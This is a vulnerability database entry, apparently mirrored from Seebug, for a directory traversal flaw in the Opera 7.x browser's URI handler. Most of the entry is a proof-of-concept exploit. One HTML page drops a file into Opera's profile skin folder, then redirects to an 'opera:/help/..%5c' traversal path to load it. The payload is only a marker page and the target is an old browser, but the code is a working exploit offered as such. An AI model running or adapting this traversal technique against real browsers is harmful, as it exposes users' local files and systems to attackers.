Lucene search
K

Opera Web Browser 7.x URI Handler Directory Traversal Vulnerability

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 12 Views

Opera Web Browser 7.x URI Handler Directory Traversal Vulnerability

Code

                                                ---------------START MAIN.HTM----------------
 
 
<html>
 
<head>
 
<script language="javascript">
 
var win=open("skin.htm") // The server should return content-type as // "application/x-opera-skin" for "Skin.htm". "Skin.htm" will be dropped in the
"<opera // dir>/profile/skin/" folder.
 
setTimeout("redir()",2000) //modify according to your situation.
 
 
function redir(){
 
window.location.href="opera:/help/..%5c/profile/skin/skin.htm" //This uses the // directory traversal flaw mentioned in advisory 2 to get the path of the
dropped file. In this // case, it is skin.htm.
 
}
 
 
</script>
 
</head>
 
 
<body>
 
<h1>This is the main file</h1>
 
</body>
 
</html>
 
 
 
---------------END MAIN.HTM----------------
 
 
---------------START SKIN.HTM----------------
 
 
<body>
 
<h1> Opera Skinned!!! </h1><p>This is Skin.htm from "<opera dir>/profile/skin/" in localhost.
 
</body>
 
 
---------------END SKIN.HTM----------------
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Jul 2014 00:00Current
6.3Medium risk
Vulners AI Score6.3
12